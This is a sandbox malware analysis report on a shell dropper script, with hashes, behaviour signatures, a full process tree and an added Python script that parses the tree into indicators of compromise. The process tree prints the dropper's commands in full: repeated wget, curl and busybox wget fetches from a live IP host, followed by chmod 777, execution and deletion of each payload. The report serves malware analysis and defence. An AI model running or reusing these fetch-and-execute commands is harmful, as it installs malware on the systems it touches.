Analysis
max time kernel: 36s
max time network: 59s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 18/10/2024, 01:46
Static task: static1
Behavioral task behavioral1: sample 583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh, resource ubuntu1804-amd64-20240508-en
Behavioral task behavioral2 (this report, platform debian-9_armhf): sample 583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample 583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample 583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh, resource debian9-mipsel-20240729-en
General
Target: 583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh
Size: 10KB
MD5: 623a04ed6371ab83886a40967de1807f
SHA1: b79de760571570719713803daace9ef35a7fb281
SHA256: 583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd
SHA512: 61c24d3ee1967f32bd51fdec5f23d5051a34d3c74a730cdbdb26d21e8add0ecd14055f5d237b316217733f5601bf5c93683212c4bf286f41e79e746aedb993fa
SSDEEP: 96:JOZ51uhxcMJFckKObcQrE00J9aIK5DNqZ51uhxcYu9JF76k+PXMcQrE00N:JOZ51uhxXJOkKOmJou51uhxUdUXN
Signatures
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process (all eleven are chmod, one per dropped payload): 687, 697, 716, 730, 746, 764, 774, 786, 803, 821, 833
Executes dropped EXE 11 IoCs
pid  ioc (the Process name is the file's basename)
689  /tmp/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl
698  /tmp/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk
717  /tmp/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA
731  /tmp/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p
749  /tmp/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1
766  /tmp/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k
775  /tmp/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW
787  /tmp/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY
805  /tmp/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv
822  /tmp/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx
834  /tmp/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt
Checks CPU configuration 1 TTPs 11 IoCs
Checks CPU information that may indicate the system is a virtual machine. Note that every hit below is attributed to curl, one per download, i.e. to the HTTP/TLS libraries probing CPU capabilities at startup, not to the script or to the dropped binaries; treat this signature as noise for this sample.
description ioc Process: File opened for reading /proc/cpuinfo by curl (11 times, once per curl -O invocation)
Reads runtime system information 22 IoCs
description ioc Process: File opened for reading /proc/self/auxv by curl (11 times); File opened for reading /proc/sys/crypto/fips_enabled by curl (11 times). As with the cpuinfo reads, these come from curl's libraries, not from the sample's own logic.
Writes file to tmp directory 11 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process: File opened for modification, all by curl (curl -O writes the fetched payload into the working directory /tmp):
/tmp/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA
/tmp/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1
/tmp/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k
/tmp/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW
/tmp/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY
/tmp/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv
/tmp/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt
/tmp/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl
/tmp/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk
/tmp/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p
/tmp/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx
Processes
Tree depth is given in brackets, then PID, image path and command line. Every curl -O process carries the signatures Checks CPU configuration, Reads runtime system information and Writes file to tmp directory; every chmod 777 carries File and Directory Permissions Modification; every ./<name> launch carries Executes dropped EXE. The script repeats the same six steps for each payload name: wget, curl -O, busybox wget, chmod 777, execute, rm.

[1] PID 657  /tmp/583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh  /tmp/583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh
  [2] PID 663  /bin/rm  /bin/rm bins.sh

  [2] PID 665  /usr/bin/wget  wget http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl
  [2] PID 673  /usr/bin/curl  curl -O http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl
  [2] PID 684  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl
  [2] PID 687  /bin/chmod  chmod 777 hhc7BkFLcnThZrYbertSK39KK7OVusPoHl
  [2] PID 689  /tmp/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl  ./hhc7BkFLcnThZrYbertSK39KK7OVusPoHl
  [2] PID 690  /bin/rm  rm hhc7BkFLcnThZrYbertSK39KK7OVusPoHl

  [2] PID 692  /usr/bin/wget  wget http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk
  [2] PID 694  /usr/bin/curl  curl -O http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk
  [2] PID 696  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk
  [2] PID 697  /bin/chmod  chmod 777 tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk
  [2] PID 698  /tmp/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk  ./tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk
  [2] PID 699  /bin/rm  rm tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk

  [2] PID 700  /usr/bin/wget  wget http://87.120.84.230/bins/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA
  [2] PID 703  /usr/bin/curl  curl -O http://87.120.84.230/bins/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA
  [2] PID 708  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA
  [2] PID 716  /bin/chmod  chmod 777 0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA
  [2] PID 717  /tmp/0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA  ./0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA
  [2] PID 719  /bin/rm  rm 0G3VhZwFwsJsdYq8F5O4O2QOjZMFdYftlA

  [2] PID 720  /usr/bin/wget  wget http://87.120.84.230/bins/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p
  [2] PID 723  /usr/bin/curl  curl -O http://87.120.84.230/bins/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p
  [2] PID 727  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p
  [2] PID 730  /bin/chmod  chmod 777 ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p
  [2] PID 731  /tmp/ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p  ./ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p
  [2] PID 732  /bin/rm  rm ZpWyOHyEj7Ae94lmJdr2lWlEmFM2jfLb8p

  [2] PID 734  /usr/bin/wget  wget http://87.120.84.230/bins/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1
  [2] PID 737  /usr/bin/curl  curl -O http://87.120.84.230/bins/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1
  [2] PID 742  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1
  [2] PID 746  /bin/chmod  chmod 777 EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1
  [2] PID 749  /tmp/EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1  ./EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1
  [2] PID 751  /bin/rm  rm EeRtQKQmlEcbzh9MuxYaKuXdEM7jV8odt1

  [2] PID 752  /usr/bin/wget  wget http://87.120.84.230/bins/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k
  [2] PID 757  /usr/bin/curl  curl -O http://87.120.84.230/bins/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k
  [2] PID 762  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k
  [2] PID 764  /bin/chmod  chmod 777 wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k
  [2] PID 766  /tmp/wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k  ./wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k
  [2] PID 768  /bin/rm  rm wFrASh83dt0yAwoJITjsVVuRF0OkRS1z4k

  [2] PID 769  /usr/bin/wget  wget http://87.120.84.230/bins/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW
  [2] PID 771  /usr/bin/curl  curl -O http://87.120.84.230/bins/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW
  [2] PID 773  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW
  [2] PID 774  /bin/chmod  chmod 777 kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW
  [2] PID 775  /tmp/kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW  ./kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW
  [2] PID 776  /bin/rm  rm kmdn50usaxiCeAMRSrvq1to0FmS6D67ADW

  [2] PID 777  /usr/bin/wget  wget http://87.120.84.230/bins/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY
  [2] PID 778  /usr/bin/curl  curl -O http://87.120.84.230/bins/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY
  [2] PID 779  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY
  [2] PID 786  /bin/chmod  chmod 777 03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY
  [2] PID 787  /tmp/03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY  ./03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY
  [2] PID 788  /bin/rm  rm 03RqqZgd5SZIoaitQ6C0XuPRJBpaBgCRZY

  [2] PID 789  /usr/bin/wget  wget http://87.120.84.230/bins/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv
  [2] PID 793  /usr/bin/curl  curl -O http://87.120.84.230/bins/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv
  [2] PID 801  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv
  [2] PID 803  /bin/chmod  chmod 777 XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv
  [2] PID 805  /tmp/XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv  ./XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv
  [2] PID 806  /bin/rm  rm XEonpRLiGIQSXp4nLlgJJNkA9M7WqlnsKv

  [2] PID 808  /usr/bin/wget  wget http://87.120.84.230/bins/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx
  [2] PID 814  /usr/bin/curl  curl -O http://87.120.84.230/bins/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx
  [2] PID 818  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx
  [2] PID 821  /bin/chmod  chmod 777 tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx
  [2] PID 822  /tmp/tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx  ./tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx
  [2] PID 823  /bin/rm  rm tz5NUCGkQAskgJ4JmH7mlixD7HbatJRqDx

  [2] PID 824  /usr/bin/wget  wget http://87.120.84.230/bins/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt
  [2] PID 831  /usr/bin/curl  curl -O http://87.120.84.230/bins/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt
  [2] PID 832  /bin/busybox  /bin/busybox wget http://87.120.84.230/bins/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt
  [2] PID 833  /bin/chmod  chmod 777 R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt
  [2] PID 834  /tmp/R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt  ./R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt
  [2] PID 835  /bin/rm  rm R0jDVWqjRSi8MqBxHxO1sXLaRgCUxpu2qt

  [2] PID 836  /usr/bin/wget  wget http://87.120.84.230/bins/fOyZSHBVPERsGL2cQAiuA0fmQm82eXgpgq  (last recorded process; the trace ends here)
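The process tree above is the whole story of this sample: for each payload name it tries three fetchers (wget, curl -O, busybox wget), makes the result world-executable, runs it and deletes it. The following added example, which is not part of the sandbox report, reconstructs that fetch / chmod / execute / delete chain per payload and derives the IoCs (download host, URLs, dropped paths) from the tree alone. Its input is constructed from the report's own process lines, reduced to three of the twelve payload names and joined into one line per process in the glued form "<image><argv...><depth>⤵PID:<pid>" that this page's export uses; the rules for splitting image path from argv are assumptions about that export format, not a documented schema.

```python
"""Reconstruct the fetch / chmod / execute / delete loop from a flattened
sandbox process tree and pull out the resulting IoCs.

Added example, not part of the sandbox report. SAMPLE_TREE is constructed
from the report's process lines (root script, initial rm, and three of the
twelve payload names). The parsing rules are assumptions about the page's
glued "<image><argv...><depth>⤵PID:<pid>" export format.
"""
import os
import re
from collections import defaultdict
from urllib.parse import urlparse

SAMPLE_TREE = """\
/tmp/583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh/tmp/583c9b647fbd1a7e1f6224f3df723a38dd970f41c31d9b37b9c69e4df5253bfd.sh1⤵PID:657
/bin/rm/bin/rm bins.sh2⤵PID:663
/usr/bin/wgetwget http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:665
/usr/bin/curlcurl -O http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:673
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:684
/bin/chmodchmod 777 hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:687
/tmp/hhc7BkFLcnThZrYbertSK39KK7OVusPoHl./hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:689
/bin/rmrm hhc7BkFLcnThZrYbertSK39KK7OVusPoHl2⤵PID:690
/usr/bin/wgetwget http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:692
/usr/bin/curlcurl -O http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:694
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:696
/bin/chmodchmod 777 tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:697
/tmp/tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk./tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:698
/bin/rmrm tFTCt6lZ18v65nyqAZPLpioGc9uDrTvDwk2⤵PID:699
/usr/bin/wgetwget http://87.120.84.230/bins/fOyZSHBVPERsGL2cQAiuA0fmQm82eXgpgq2⤵PID:836
"""

# Trailing "<depth>⤵PID:<pid>"; the body before it is the image path glued to argv.
TAIL = re.compile(r"^(?P<body>.*?)(?P<depth>\d)⤵PID:(?P<pid>\d+)$")
FETCHERS = {"wget", "curl", "busybox"}


def split_image(body):
    """Split '<image><argv...>' where argv[0] begins.

    argv[0] is the image path itself, its basename, or './<basename>', and is
    followed by a space or the end of the string; the first prefix meeting
    that condition is the image path (a shorter prefix fails the delimiter test).
    """
    for i in range(2, len(body) + 1):
        image, rest = body[:i], body[i:]
        base = image.rsplit("/", 1)[1]
        if not base:
            continue
        for token in (image, base, "./" + base):
            if rest.startswith(token) and (len(rest) == len(token) or rest[len(token)] == " "):
                return image, rest.split()
    raise ValueError("cannot split image from argv: %r" % body)


def parse_tree(text):
    """Return one dict per process: pid, depth, image path, argv list."""
    procs = []
    for line in text.splitlines():
        m = TAIL.match(line.strip())
        if not m:
            continue  # blank line or signature tag line, not a process
        image, argv = split_image(m["body"])
        procs.append({"pid": int(m["pid"]), "depth": int(m["depth"]),
                      "image": image, "argv": argv})
    return procs


def reconstruct_chains(procs):
    """Group events by payload file name: fetch PIDs and URLs, chmod, exec, rm."""
    chains = defaultdict(lambda: {"fetch": [], "urls": set(), "chmod": None,
                                  "exec": None, "rm": None})
    for p in procs:
        tool, args = os.path.basename(p["image"]), p["argv"]
        if tool in FETCHERS:
            for url in (a for a in args[1:] if a.startswith(("http://", "https://"))):
                name = urlparse(url).path.rsplit("/", 1)[-1]  # payload name = URL basename
                chains[name]["fetch"].append(p["pid"])
                chains[name]["urls"].add(url)
        elif tool == "chmod" and len(args) >= 3:
            chains[args[-1]]["chmod"] = (args[1], p["pid"])
        elif tool == "rm" and len(args) >= 2:
            chains[args[-1]]["rm"] = p["pid"]
        elif p["image"].startswith("/tmp/") and args[0] == "./" + tool:
            chains[tool]["exec"] = p["pid"]  # dropped file launched from /tmp
    return dict(chains)


def executed_payloads(chains):
    """Names that were fetched, made world-executable and actually run."""
    return sorted(n for n, c in chains.items()
                  if c["fetch"] and c["chmod"] and c["exec"] is not None)


def iocs(chains):
    """Network and host indicators derivable from the tree alone."""
    urls = sorted(u for c in chains.values() for u in c["urls"])
    return {"hosts": sorted({urlparse(u).hostname for u in urls}), "urls": urls,
            "dropped": sorted("/tmp/" + n for n, c in chains.items() if c["exec"] is not None)}


if __name__ == "__main__":
    chains = reconstruct_chains(parse_tree(SAMPLE_TREE))
    for name in executed_payloads(chains):
        c = chains[name]
        print(f"{name}: fetch={c['fetch']} chmod={c['chmod']} exec={c['exec']} rm={c['rm']}")
    print(iocs(chains))
```

On the sample above the two complete chains are reported with their fetch, chmod, exec and rm PIDs, while fOyZSHBVPERsGL2cQAiuA0fmQm82eXgpgq shows up only as a fetch and is therefore excluded from executed_payloads and from the dropped-file list; requiring all three of fetch, chmod 777 and execution before flagging a payload is what keeps a bare failed download from being counted as a compromise.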
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 153B
MD5: 998368d7c95ea4293237f2320546e440
SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97